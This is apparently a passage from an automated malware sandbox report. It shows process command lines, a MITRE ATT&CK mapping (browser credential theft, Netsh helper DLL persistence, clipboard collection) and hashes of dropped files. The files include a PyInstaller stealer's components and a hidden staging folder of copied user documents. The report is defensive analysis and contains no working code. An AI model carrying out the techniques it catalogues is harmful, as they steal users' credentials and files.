    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4820 -childID 4 -isForBrowser -prefsHandle 6440 -prefMapHandle 6444 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0203125b-5537-4f76-ad4b-652fd7655b43} 5636 "\\.\pipe\gecko-crash-server-pipe.5636" tab
    3⤵
    PID:1668
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5276 -childID 5 -isForBrowser -prefsHandle 5284 -prefMapHandle 5288 -prefsLen 27051 -prefMapSize 244705 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {954fba12-3188-44d0-952f-4d3d2b81b0f6} 5636 "\\.\pipe\gecko-crash-server-pipe.5636" tab
    3⤵
    PID:452

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a807b1c91ac66f33f88a787d64904c1

SHA1
83c554c7de04a8115c9005709e5cd01fca82c5d3

SHA256
155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

SHA512
29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
20fba082b7902a8baf8f88a8565e5515

SHA1
d49c2d1381fd452de0c8dabf03e7206a569f04c5

SHA256
69e3995dfc6912e865f01ff36106d397473ee3e3c8cce258991b6b1791accf20

SHA512
ccf1e872a4174c719b6f5514bb393b6e43a0fe23e068882d221301ca05c20c317a04555a5fd4e542bf46f5ee25146782fca7335a67faa4069a08b4fd307d916d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e1fdd1b66d2fee9f6a052524d4ddca5

SHA1
0a9d0994559d1be2eecd8b0d6960540ca627bdb6

SHA256
4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

SHA512
5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\etc817bi.default-release\activity-stream.discovery_stream.json

Filesize
25KB

MD5
6e576704a1cb7a94bb174892c5c77cf5

SHA1
917941954db2444cfc74e50d2f9f1b08d45a4bd5

SHA256
dd4881f7b1e08ae0259c68129e80d75dcbe34a544a8c901af3cbc4a4722f056a

SHA512
e2634e0c5acf048680ab912dccdf14fcc2a004babf218153e201709135f802f720ade7d6d2d81c5949f1ceeddeec5017502ab819e3f20370cacc73da0919fd79

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\etc817bi.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
15KB

MD5
96c542dec016d9ec1ecc4dddfcbaac66

SHA1
6199f7648bb744efa58acf7b96fee85d938389e4

SHA256
7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

SHA512
cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\etc817bi.default-release\startupCache\webext.sc.lz4

Filesize
107KB

MD5
64d80e96c4f63cac9999c7f3af42e300

SHA1
84a7f000ee9abcf6ab2871a5b1a28033890dbe81

SHA256
635aff13ee9736051bf87f28f275414b7208420d45c88ba7d0817db23ebbac5f

SHA512
5b64011bfba7093c35a1fb1526c96720ca89a2171f3e45995b303a538968bb7caf1e652b6dc3b1bd5dcb13f651e847c6d6c08ebc5d8e12f84e2f335eb227fb25

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB71B.tmp

Filesize
1KB

MD5
70c260698283c2f5cbd22b4cf684730e

SHA1
a1bb2c7e644375fde7145a769a7ca28d76fec76f

SHA256
ab269765c6d7744dfe4d73492efb41ac42945cf89cc257df929d838f365f8641

SHA512
14bd4010db60a10c21674804ecdbd2f5c957230e1703169916e39e0ce56bd2cdb8235eac89c08d8e472f296646b077c78c6680244e29ef1edba7100d735c43aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\_bz2.pyd

Filesize
48KB

MD5
5cd942486b252213763679f99c920260

SHA1
abd370aa56b0991e4bfee065c5f34b041d494c68

SHA256
88087fef2cff82a3d2d2d28a75663618271803017ea8a6fcb046a23e6cbb6ac8

SHA512
6cd703e93ebccb0fd896d3c06ca50f8cc2e782b6cc6a7bdd12786fcfb174c2933d39ab7d8e674119faeca5903a0bfac40beffb4e3f6ca1204aaffefe1f30642c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\_ctypes.pyd

Filesize
59KB

MD5
4878ad72e9fbf87a1b476999ee06341e

SHA1
9e25424d9f0681398326252f2ae0be55f17e3540

SHA256
d699e09727eefe5643e0fdf4be4600a1d021af25d8a02906ebf98c2104d3735d

SHA512
6d465ae4a222456181441d974a5bb74d8534a39d20dca6c55825ebb0aa678e2ea0d6a6853bfa0888a7fd6be36f70181f367a0d584fccaa8daa940859578ab2b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\_decimal.pyd

Filesize
107KB

MD5
d60e08c4bf3be928473139fa6dcb3354

SHA1
e819b15b95c932d30dafd7aa4e48c2eea5eb5fcb

SHA256
e21b0a031d399ffb7d71c00a840255d436887cb761af918f5501c10142987b7b

SHA512
6cac905f58c1f25cb91ea0a307cc740575bf64557f3cd57f10ad7251865ddb88965b2ad0777089b77fc27c6d9eb9a1f87456ddf57b7d2d717664c07af49e7b58

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\_hashlib.pyd

Filesize
35KB

MD5
edfb41ad93bc40757a0f0e8fdf1d0d6c

SHA1
155f574eef1c89fd038b544778970a30c8ab25ad

SHA256
09a0be93d58ce30fa7fb8503e9d0f83b10d985f821ce8a9659fd0bbc5156d81e

SHA512
3ba7d225828b37a141ed2232e892dad389147ca4941a1a85057f04c0ed6c0eab47b427bd749c565863f2d6f3a11f3eb34b6ee93506dee92ec56d7854e3392b10

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\_lzma.pyd

Filesize
86KB

MD5
25b96925b6b4ea5dd01f843ecf224c26

SHA1
69ba7c4c73c45124123a07018fa62f6f86948e81

SHA256
2fbc631716ffd1fd8fd3c951a1bd9ba00cc11834e856621e682799ba2ab430fd

SHA512
97c56ce5040fb7d5785a4245ffe08817b02926da77c79e7e665a4cfa750afdcb7d93a88104831944b1fe3262c0014970ca50a332b51030eb602bb7fb29b56ae3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\_queue.pyd

Filesize
26KB

MD5
c2ba2b78e35b0ab037b5f969549e26ac

SHA1
cb222117dda9d9b711834459e52c75d1b86cbb6e

SHA256
d8b60222732bdcedddbf026f96bddda028c54f6ae6b71f169a4d0c35bc911846

SHA512
da2bf31eb6fc87a606cbaa53148407e9368a6c3324648cb3df026a4fe06201bbaab1b0e1a6735d1f1d3b90ea66f5a38d47daac9686520127e993ecb02714181f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\_socket.pyd

Filesize
44KB

MD5
aa8435614d30cee187af268f8b5d394b

SHA1
6e218f3ad8ac48a1dde6b3c46ff463659a22a44e

SHA256
5427daade880df81169245ea2d2cc68355d34dbe907bc8c067975f805d062047

SHA512
3ccf7ec281c1dc68f782a39f339e191a251c9a92f6dc2df8df865e1d7796cf32b004ea8a2de96fe75fa668638341786eb515bac813f59a0d454fc91206fee632

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\_sqlite3.pyd

Filesize
57KB

MD5
81a43e60fc9e56f86800d8bb920dbe58

SHA1
0dc3ffa0ccbc0d8be7c7cbae946257548578f181

SHA256
79977cbda8d6b54868d9cfc50159a2970f9b3b0f8df0ada299c3c1ecfdc6deb0

SHA512
d3a773f941f1a726826d70db4235f4339036ee5e67667a6c63631ff6357b69ba90b03f44fd0665210ee243c1af733c84d2694a1703ebb290f45a7e4b1fc001c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\_ssl.pyd

Filesize
66KB

MD5
c0512ca159b58473feadc60d3bd85654

SHA1
ac30797e7c71dea5101c0db1ac47d59a4bf08756

SHA256
66a0e06cce76b1e332278f84eda4c032b4befbd6710c7c7eb6f5e872a7b83f43

SHA512
3999fc4e673cf2ce9938df5850270130247f4a96c249e01258a25b125d64c42c8683a85aec64ed9799d79b50f261bcfac6ee9de81f1c5252e044d02ac372e5c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\base_library.zip

Filesize
1.3MB

MD5
100dfe4e2eb2ce4726a43dbd4076b4ee

SHA1
5671116823ad50f18c7f0e45c612f41711cff8fe

SHA256
10b1adf18da86baebdbe7ee7561bc0ffa2aabf88e9f03cc34ab7943b25665769

SHA512
1b63f7841ea699c46c86568407d4f1cff21db9f5d57aecc374e3eae3c283349090d828df909f0213d1b177992b49caf22d5154958080fc06238e9e3b0cdf7bb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\blank.aes

Filesize
110KB

MD5
1b12dfcf9b1e6a58cbba1695085ee183

SHA1
afcea4eb7aab61bfcefbed49f0a05b7d3d43b928

SHA256
b12ae54ebc12902d31738bf73372f8704a708812889cb854f5f61f50b6248bc9

SHA512
b925a2390e647d1ad529798414edf956a1cca6ba3c6f88a28eb65d6a81b78d68b85c6bb6f206bc30587094f78e4fcccab4341b9ed1ce116035d5f3903a5cf0fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\libcrypto-3.dll

Filesize
1.6MB

MD5
7f1b899d2015164ab951d04ebb91e9ac

SHA1
1223986c8a1cbb57ef1725175986e15018cc9eab

SHA256
41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

SHA512
ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\libssl-3.dll

Filesize
222KB

MD5
264be59ff04e5dcd1d020f16aab3c8cb

SHA1
2d7e186c688b34fdb4c85a3fce0beff39b15d50e

SHA256
358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

SHA512
9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\python312.dll

Filesize
1.7MB

MD5
18677d48ba556e529b73d6e60afaf812

SHA1
68f93ed1e3425432ac639a8f0911c144f1d4c986

SHA256
8e2c03e1ee5068c16e61d3037a10371f2e9613221a165150008bef04474a8af8

SHA512
a843ab3a180684c4f5cae0240da19291e7ed9ae675c9356334386397561c527ab728d73767459350fa67624f389411d03665f69637c5f5c268011d1b103d0b02

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\select.pyd

Filesize
25KB

MD5
f5540323c6bb870b3a94e1b3442e597b

SHA1
2581887ffc43fa4a6cbd47f5d4745152ce40a5a7

SHA256
b3ff47c71e1023368e94314b6d371e01328dae9f6405398c72639129b89a48d2

SHA512
56ee1da2fb604ef9f30eca33163e3f286540d3f738ed7105fc70a2bccef7163e0e5afd0aeb68caf979d9493cd5a6a286e6943f6cd59c8e18902657807aa652e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\sqlite3.dll

Filesize
644KB

MD5
8a6c2b015c11292de9d556b5275dc998

SHA1
4dcf83e3b50970374eef06b79d323a01f5364190

SHA256
ad9afd1225847ae694e091b833b35aa03445b637e35fb2873812db358d783f29

SHA512
819f4e888831524ceeed875161880a830794a748add2bf887895d682db1cec29eaddc5eddf1e90d982f4c78a9747f960d75f7a87bdda3b4f63ea2f326db05387

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41962\unicodedata.pyd

Filesize
295KB

MD5
3f2da3ed690327ae6b320daa82d9be27

SHA1
32aebd8e8e17d6b113fc8f693259eba8b6b45ea5

SHA256
7dc64867f466b666ff1a209b0ef92585ffb7b0cac3a87c27e6434a2d7b85594f

SHA512
a4e6d58477baa35100aa946dfad42ad234f8affb26585d09f91cab89bbef3143fc45307967c9dbc43749ee06e93a94d87f436f5a390301823cd09e221cac8a10

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_50qnvfum.krv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\d1fiwgjv\d1fiwgjv.dll

Filesize
4KB

MD5
ed8d504915c88f7f8be3ebbe6e837071

SHA1
7b451e37d47c2d30a1cb96c851d453c3521850c2

SHA256
66f686e45c3b7558d36923f2c11d59c25638ebe2bbedd4287c757d3d5fc01a25

SHA512
0bd05231687a379e03b34d4f54ac3d0551d75e031aba876cb0067c9db29a244c08af2809a747e5d1d2606bcdd485e0fdb72a3b38b2d9c9b207473c68c4f9c11d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Desktop\BackupInitialize.midi

Filesize
570KB

MD5
1f9364ad5de9e4b1476a62743628b626

SHA1
7dccbdfbc358edb41093442be9812b9ad9040832

SHA256
01859f2eb99417d83fab3b21085d94d57d61da1bd4529705475768b32b6ab73f

SHA512
b30b612f36e9985e3fa78a1398368fea090d3c5ff886c6bca738b186db015f3f7a03dac3f231547cb547ece4089f5e877928c9692f7d4e9d1af7065f1c068c0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Desktop\BackupRestart.mpeg

Filesize
937KB

MD5
6c6f00233da2a9d771f7abaa9f2a494b

SHA1
91a3491acc0d428d8a7053323e106f106cb46769

SHA256
ab088cb3e3df12313284d59dbe4faafa224ed3752cb5bf6d12684814e0e109d3

SHA512
93649cf80f8f47fb2ae7b5eb2e533373e437421bd516ddfd47bab3dfd91f449e103e8bb1df457e515e80d1ed2f8685c97a570a910ab112b1879be2c0f842791d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Desktop\ConnectExit.docx

Filesize
18KB

MD5
1583ca1855f0e9bfd28eb9ac53840bcc

SHA1
4fdd4a4557ad4cbbe120803aa172b3ee57d3d47a

SHA256
a3ff393af31b3c6c483a5a4d73b5452b592dcaa0c2a0865f2d393ca806fc320f

SHA512
24209439a77aadb2d6eefd15eb35dc8e29849ddff94a96510a7cbabaf6b44528c93c3fce63ac481082b8e5640a33c48c1b8ceb815326069d2fb632ea1007e9d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Desktop\LockSuspend.docx

Filesize
18KB

MD5
315683550aab07537631dea96cc5dfd6

SHA1
8793a08f028e39026d18349c3d8190bbc69ad13e

SHA256
ef20831f98d5a279623a355859f1366b8a0750546ead9746f4463e426564b422

SHA512
abe040bf4a5ba35575259be0a7f6119df37ee231e6dcb678a9ae718156a861b25665fe9d3678f71e84f2fde784422e9699342c4ac605cd5c484facced94156c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Desktop\SetApprove.txt

Filesize
1.1MB

MD5
2638151cbab51d12927a638192691922

SHA1
a03c6bbceecf5757ab7eae80cdcb77edd98c0186

SHA256
6f03645994db0bf0130cc9c917e60b1285bf1e2d3ddcb56d17f13b6856c43bfa

SHA512
813cd8d20cccc43bfaf48dcaf812322ac30f20e92046f80be2bbd79fde73dbe960a273ac0f961f0c236d30e28d66f0ee0b9ba13523876440e762ed7c650265fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Desktop\ShowUninstall.docx

Filesize
14KB

MD5
e1d57f61e320315ab210720c193f5871

SHA1
dcad7ff0e31bc610d07b34e5f5d7edc636b7ce7a

SHA256
0dd6c6889da259e60af52d918a58460b1e35fe13d014fbd3c1a24c6be51063a6

SHA512
5363e04e0b5389ff33001aef2c56cce20c1a97669a884238044be383e8c2f58448e7668a94d98b0d4c2549abc975ce94cb302a51a27bf3c10476fbb6e9da903b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Desktop\SubmitImport.jpg

Filesize
901KB

MD5
2bb5865f0094464f38727138003655b2

SHA1
bca8108d9a7073e880b1dc026c6dca676e207eee

SHA256
87be6ffcb0a732abe0fc5e6a63ecf650e716060537e379aab139badbfe48458d

SHA512
2646a7fc08a14a70caa63cdbea312fe22803cee38ce2ac3e3117a134a37665aadf04a50996eeace63aee5c12b898eb695e668fff294a0896be5d2a3e0a03f4b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Desktop\SuspendComplete.txt

Filesize
753KB

MD5
d4cdbd6a46a7901e87d2b2d2fe2cb693

SHA1
480a06d1413223ac8e8396de795ba6afd0129d62

SHA256
b2123c55c071b8b90c921a240f6aa146a4914ac26f9be877cc99fb0bd19ac54b

SHA512
9b378707a6fe337899d5f80d359808ed7b4d230a5edfb6f001db23b79de1152998404c1ac5a5e9434c991e675e0b68d022f19ce74ed6de29fc3e30b010af9ce4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Desktop\TestDisable.doc

Filesize
1.1MB

MD5
c7a0046a75cc789f9a49de26d011112b

SHA1
da1681b493236bf4e2a0df89671135d99536fa70

SHA256
44602a971b48f6f5a56897008c2fcfac9d939af0cf41cf09ca413762d6a444f8

SHA512
fa0ef4182a1b8414be11876ffc53231ad503390e209edc10142c19607f5775416b761e7367b5fec92248a588601de6c7c061e8bc27f6151e6802631ad15a0f1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Documents\AddConvertFrom.txt

Filesize
748KB

MD5
6c4bec3eea85214bb9deeced3a5bf886

SHA1
e747406c90a4ea2935da89ccfd23ab3c2b7c0ae2

SHA256
72840fc695010f097efbba6a1cdaecfd5ca54801a4b5e755aaf5884ed922e1b8

SHA512
0cfe4eacb976f10afb9efe53e5fcae4eace9d0a5c533c5d205d880dd1559dc7c2e494620964d55b9c007e51b9680612a740f34dd094110713f80bf9ad4aa21e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Documents\BackupRestore.vstm

Filesize
528KB

MD5
2e64e5af1835f7e7c59671b521848d35

SHA1
af8009286f0f698c1e237967d0e7ef0f75941ae9

SHA256
9b49c1b81bbe4c33ef3697916e5bb0a0c0ebc5990ca95b70f966aabc3935dba1

SHA512
883b7f6301d0797d8e2c80a10e1ca31a65e2d88469e69efe4e7b2c16aea7411498f6c619ff1be9f6b10ae13514b9638cab75b19acaa51757080657b9fa515320

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Documents\RedoUndo.pdf

Filesize
352KB

MD5
28870634298c7c5544831673af0b81ef

SHA1
1e30f34ce34814169c786f694d9583683f9c9459

SHA256
ec70401c71966103680f14c44d5eadf3164b4dc3d5e7205920af0bf899b7be44

SHA512
772c79a09b8708b9aa82975d2139ca4921295690c2e9629265b7db4c6bb1acbbc49b7a4ed6c9bc146351d117bb250e89176f739838674aaac3f185f17d2079ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌‍‎‍\Common Files\Documents\ResizeDisable.txt

Filesize
506KB

MD5
b7231e00d2b9f57e875eefe530f03a23

SHA1
16a477f4e5c48ad3a96a873d3524a5b8262f6d16

SHA256
7eb05f72a9ed8dcb1f217a10a7760a4cea3e1977027654bf41179ad4e55bf822

SHA512
90c74eeae540f6cbc7efa568e58eeef46e14db3de067d5553dec7a91e1c74d16021b8bb6dc15144345afca04295e98529c1ddff0a1213cf621932851fe8f40fa

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\AlternateServices.bin

Filesize
8KB

MD5
f8cc56312e53a15785cd1fd0d34c52ce

SHA1
880e17b45a36feb4a3542e56b05fbe0377d5ca67

SHA256
bd2cde728342d3a433c1503de9377b41c607876c072b06428ed9b7b4f416e8ee

SHA512
5d0a522301a53dfae742feb98a5621ad1e88188f97b900e76291e04028491378d4a7fbdfa2e4f4b67a78d2a1c5aa3786309004346adcd401e161e48055e3f548

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\AlternateServices.bin

Filesize
6KB

MD5
e60081492a0e9e7c07ff6ad63fd00873

SHA1
036259b75da5b25db9c2e55d46dc0cf5e8c69b4d

SHA256
670f75814a5f825777d97c58db362024336eb39cd990545867a1354d1dcc44f1

SHA512
59faeda742e74194f51ba83a4cfdb9a9d06b2f31e8891f37e6f2c96edc3f9cef78711e16938c6f4d4090c4450c5989f5c346c768de10e14cf2cafa1c9e8b43af

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\datareporting\glean\db\data.safe.tmp

Filesize
23KB

MD5
d09ad67e58cb815741f1b0335693861b

SHA1
d751fa80128c70247c8b966acf156fc5f97cd4b0

SHA256
7e667bbf0b52bf8a33b7f39d22b427ed18e9f4838bd8d97029352dbb41430786

SHA512
3869179aa168b0bb106617271a14fb312a77ab550d52ae8185d305a4de14849d376ac960a895f451b779e8cf221180e52f5823a020250a894543d719b4ed6aec

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\datareporting\glean\db\data.safe.tmp

Filesize
24KB

MD5
2d25bef4b37e70ddb23b183a8f14d317

SHA1
1699c9e6eab3106c19cf2fb2fb50803efd9d6905

SHA256
16beacca174591693e1752572d95c01e84eaa4517afb81c9bf46e7649f5de12d

SHA512
73a0bbd21af9930224332c5427fccf25ef438ff29fc1e491f0acff4186c81606101aa34d07d2655311334bd449861effe79a57cfbb562b0ad4483e4348002472

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
029e480df26885c399e9daf32673cfae

SHA1
8996bab87481e307e66974f55f2509308990cdb3

SHA256
150a6b2b9f34298455adc2462037f44bfa40914dce3debc5aced867abd4a97c4

SHA512
478f7e0882643514f00109c246fae26d3717970cbece05f7973862f88c9ed64189d71e06fcb667f2efa893617a7e0df4bbf926ff4252d47162b5ff7be78e26f7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
6de90d5528d2dfb5dc5009ecffe98353

SHA1
743ff98519a3e11d49605ecfd8e91bdbb2b450fb

SHA256
434d408588cefaa9591daf8928a43da1e76b05986c9fb21cbf3eeaa68686a32a

SHA512
1cfde5e247434e466985d1d274ed788709b58d9e957f9e1a14b2ca12388aed546fe0595a0b294edfc19fd6ff991dd5ddf0ac5d63781274f23fb6d8f1dec4190d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\datareporting\glean\db\data.safe.tmp

Filesize
14KB

MD5
884b4779ba1690377a9a89a5d51e3496

SHA1
bb594b0e9e2137c81f36b5d84b01847cfd8a93c6

SHA256
4b6491ac86b93cf7ddfb660efd1c0dfbd40db77aa0d358d670503b46a5176104

SHA512
e1f7661e21303ecc2f1c4a5b93384ec354e0e135eee3c31479d6ac886565003d32068012ccaea10ac8cb10af1dbc092cf66500ed9be6ab3bbd4615b3c74bfbd9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\etc817bi.default-release\datareporting\glean\pending_pings\45aca761-9df8-4fad-86d8-44797021df84

Filesize
671B

MD5
ed15f78b6babe63485e5cd99eea2ca8a

SHA1
e4260ebc5b84e13454121dadd73074ad5827465d

SHA256
1719a1f2dd7dfdb8803a3d75cf4e694dabeb78db32d6a2c68f614bfcef772cf9

SHA512
0102b99ce2a64b6c498ebb1dcb166e6e3ff273dee14170995e8965307f10f9b2c18cd64a47e17104499e358d3fe9851970f1c34400fa8ebd63e0ce46427ff7e1

Download Submit
